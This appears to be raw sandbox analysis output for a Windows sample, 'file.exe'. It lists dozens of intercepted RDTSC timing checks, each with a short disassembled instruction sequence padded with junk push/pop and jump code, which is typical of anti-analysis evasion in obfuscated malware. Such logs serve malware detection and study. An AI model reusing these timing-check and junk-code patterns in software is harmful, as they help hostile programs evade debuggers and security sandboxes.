                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA4E8E second address: B87AEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007EFD6CF3F378h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov cx, bx 0x00000027 mov dword ptr [ebp+122D1FA2h], edx 0x0000002d lea eax, dword ptr [ebp+1248AC57h] 0x00000033 xor edx, 625643A7h 0x00000039 push eax 0x0000003a pushad 0x0000003b jmp 00007EFD6CF3F37Fh 0x00000040 pushad 0x00000041 pushad 0x00000042 popad 0x00000043 push ecx 0x00000044 pop ecx 0x00000045 popad 0x00000046 popad 0x00000047 mov dword ptr [esp], eax 0x0000004a mov dword ptr [ebp+122D1A3Fh], ebx 0x00000050 call dword ptr [ebp+122D249Fh] 0x00000056 pushad 0x00000057 jmp 00007EFD6CF3F382h 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA504A second address: BA5061 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007EFD6CDBF89Ch 0x00000011 jnp 00007EFD6CDBF896h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA54B1 second address: BA54B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA54B7 second address: BA54BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA54BC second address: BA54E6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jnp 00007EFD6CF3F382h 0x00000012 jmp 00007EFD6CF3F37Ch 0x00000017 mov eax, dword ptr [eax] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c jbe 00007EFD6CF3F376h 0x00000022 pop eax 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA54E6 second address: BA54F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007EFD6CDBF896h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA55EE second address: BA561A instructions: 0x00000000 rdtsc 0x00000002 jns 00007EFD6CF3F376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c push edi 0x0000000d jo 00007EFD6CF3F376h 0x00000013 pop edi 0x00000014 pop ecx 0x00000015 xchg eax, esi 0x00000016 sub cx, 4F18h 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f jg 00007EFD6CF3F376h 0x00000025 jnp 00007EFD6CF3F376h 0x0000002b popad 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA561A second address: BA5621 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA5912 second address: BA591D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007EFD6CF3F376h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA591D second address: BA5948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007EFD6CDBF8A0h 0x0000000d nop 0x0000000e mov ecx, dword ptr [ebp+122D36C7h] 0x00000014 push 00000004h 0x00000016 push eax 0x00000017 jnl 00007EFD6CDBF8A4h 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA5948 second address: BA594E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA5D43 second address: BA5D47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA5D47 second address: BA5D4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA611B second address: BA616B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD6CDBF8A7h 0x00000009 popad 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d je 00007EFD6CDBF896h 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 jl 00007EFD6CDBF89Eh 0x0000001c jl 00007EFD6CDBF898h 0x00000022 pushad 0x00000023 popad 0x00000024 nop 0x00000025 mov dword ptr [ebp+122D19ABh], edi 0x0000002b lea eax, dword ptr [ebp+1248AC9Bh] 0x00000031 add edx, dword ptr [ebp+122D2D6Dh] 0x00000037 nop 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA616B second address: BA616F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA616F second address: BA6173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA6173 second address: BA6179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA6179 second address: BA617E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA617E second address: BA61E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jbe 00007EFD6CF3F378h 0x0000000f jmp 00007EFD6CF3F383h 0x00000014 popad 0x00000015 nop 0x00000016 pushad 0x00000017 movsx edx, ax 0x0000001a or eax, dword ptr [ebp+12462387h] 0x00000020 popad 0x00000021 lea eax, dword ptr [ebp+1248AC57h] 0x00000027 sub edi, dword ptr [ebp+122D19C2h] 0x0000002d nop 0x0000002e jl 00007EFD6CF3F37Ah 0x00000034 push eax 0x00000035 je 00007EFD6CF3F3A2h 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007EFD6CF3F382h 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA61E1 second address: B88683 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CDBF8A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b sub dword ptr [ebp+122D2ED0h], ebx 0x00000011 pop ecx 0x00000012 call dword ptr [ebp+12455F37h] 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d js 00007EFD6CDBF896h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD9748 second address: BD974E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD9B97 second address: BD9B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD9B9D second address: BD9BA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD9BA1 second address: BD9BA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD9BA5 second address: BD9BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007EFD6CF3F376h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD9D3E second address: BD9D44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD9D44 second address: BD9D49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD9D49 second address: BD9D4E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD9D4E second address: BD9D59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD9D59 second address: BD9D5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDFB50 second address: BDFB73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007EFD6CF3F376h 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007EFD6CF3F385h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDFB73 second address: BDFB77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDE9B6 second address: BDE9BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDE9BE second address: BDE9C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDE9C7 second address: BDE9CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDE9CB second address: BDE9D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDE9D1 second address: BDE9D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDE9D7 second address: BDE9FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFD6CDBF89Dh 0x00000008 jg 00007EFD6CDBF896h 0x0000000e jns 00007EFD6CDBF896h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDE9FD second address: BDEA01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDE5C6 second address: BDE5DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFD6CDBF8A2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDE5DC second address: BDE5E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDF395 second address: BDF3EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD6CDBF89Ah 0x00000009 popad 0x0000000a jnc 00007EFD6CDBF89Ch 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007EFD6CDBF89Fh 0x00000017 jp 00007EFD6CDBF8A6h 0x0000001d pushad 0x0000001e jmp 00007EFD6CDBF8A4h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDF50F second address: BDF51F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007EFD6CF3F376h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDF51F second address: BDF525 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDF525 second address: BDF561 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007EFD6CF3F37Dh 0x00000008 jmp 00007EFD6CF3F380h 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007EFD6CF3F386h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDF561 second address: BDF565 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE1114 second address: BE111A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE69A2 second address: BE69AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE69AB second address: BE69AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE69AF second address: BE69C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD6CDBF8A1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE5B46 second address: BE5B4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE5CBE second address: BE5CCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD6CDBF89Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE5F6E second address: BE5F9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007EFD6CF3F376h 0x0000000a push eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jp 00007EFD6CF3F378h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007EFD6CF3F384h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE5F9C second address: BE5FA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE5FA3 second address: BE5FA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE60FE second address: BE612C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007EFD6CDBF896h 0x0000000a jnl 00007EFD6CDBF896h 0x00000010 jmp 00007EFD6CDBF8A9h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push edi 0x00000019 pop edi 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE612C second address: BE6132 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE6132 second address: BE6139 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE50CC second address: BE50DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007EFD6CF3F376h 0x0000000a ja 00007EFD6CF3F376h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE50DC second address: BE510E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CDBF8A4h 0x00000007 jmp 00007EFD6CDBF8A3h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE8420 second address: BE8424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEB621 second address: BEB62C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEB62C second address: BEB636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007EFD6CF3F376h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEAF84 second address: BEAF91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jl 00007EFD6CDBF89Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEAF91 second address: BEAF99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEB29A second address: BEB2BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CDBF8A5h 0x00000007 js 00007EFD6CDBF896h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEB2BC second address: BEB2E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD6CF3F37Dh 0x00000009 pop edx 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d jns 00007EFD6CF3F376h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 jbe 00007EFD6CF3F382h 0x0000001c jne 00007EFD6CF3F376h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEB2E8 second address: BEB2EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BED5C5 second address: BED5D5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jns 00007EFD6CF3F376h 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BED5D5 second address: BED5E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFD6CDBF89Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF3A19 second address: BF3A1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA5BEE second address: BA5BF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA5BF2 second address: BA5BF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF3FAE second address: BF3FB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF3FB2 second address: BF3FBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF49E3 second address: BF49E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF49E7 second address: BF49F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF49F0 second address: BF49F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF49F8 second address: BF4A01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF7DE1 second address: BF7DFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 ja 00007EFD6CDBF896h 0x0000000d jmp 00007EFD6CDBF89Fh 0x00000012 pop ebx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF7F33 second address: BF7F37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF7F37 second address: BF7F3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF7F3D second address: BF7F7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007EFD6CF3F383h 0x0000000c jns 00007EFD6CF3F376h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop ebx 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007EFD6CF3F385h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF8357 second address: BF8369 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007EFD6CDBF89Ch 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF8369 second address: BF8381 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFD6CF3F384h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF8381 second address: BF8396 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CDBF89Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF84FB second address: BF84FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF84FF second address: BF856B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD6CDBF8A6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jmp 00007EFD6CDBF89Ah 0x00000011 pop edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007EFD6CDBF8A2h 0x0000001a jmp 00007EFD6CDBF8A7h 0x0000001f popad 0x00000020 popad 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 jmp 00007EFD6CDBF8A1h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF856B second address: BF85A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CF3F387h 0x00000007 jmp 00007EFD6CF3F386h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF85A0 second address: BF85A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
